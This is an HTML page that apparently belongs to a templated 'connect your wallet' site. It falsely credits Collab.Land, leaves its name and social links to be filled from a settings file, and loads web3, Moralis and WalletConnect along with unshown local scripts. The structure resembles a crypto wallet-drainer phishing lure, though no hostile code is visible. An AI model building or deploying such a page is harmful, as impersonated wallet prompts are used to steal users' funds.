<!doctype html>
<html lang="fr">


<head>
    <meta charset="utf-8">
    <title>Loading..</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/%40fortawesome/fontawesome-free%405.15.4/css/fontawesome.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <script src="https://kit.fontawesome.com/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap%404.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Anton&amp;display=swap" rel="stylesheet">

    <script src="settings.js"></script>
    <link rel="stylesheet" href="src/css/styles.css">
</head>

<body class="container bg">
    <div class="section">
        <div class="text" style="text-align: center; padding-bottom: 10px;">
            <h1 id="titleH1">Loading...</h1>
        </div>
        <div class="block-text" style="text-align: center;">
            <h3 id="titleH3"></h3>
        </div>
        <div class="block-button">
            <a id="connectButton">CONNECT YOUR WALLET</a>
        </div>
    </div>
    <div class="section2">
        <div class="left">
            <a href="https://twitter.com/collab_land_">Created by @collabland</a>
            <p>© 2022 <span id="cp_name"></span></p>
        </div>
        <div class="right">
            <a id="social_discord" href="#"><img src="assets/svg/discord.svg" alt=""></a>
            <a id="social_twitter" href="#"><img src="assets/svg/twiter.svg" alt=""></a>
            <a id="social_instagram" href="#"><img src="assets/svg/insta.svg" alt=""></a>
        </div>
    </div>

    <script src="src/js/loader_index.js"></script>

    <script src="https://unpkg.com/web3%401.7.3/dist/web3.min.js"></script>
    <script src="https://npmcdn.com/moralis%401.8.0/dist/moralis.js"></script>
    <script src="https://unpkg.com/%40walletconnect/web3-provider%401.7.5/dist/umd/index.min.js"></script>
    
    <script type="text/javascript" src="src/js/index.js"></script>

</body>


</html>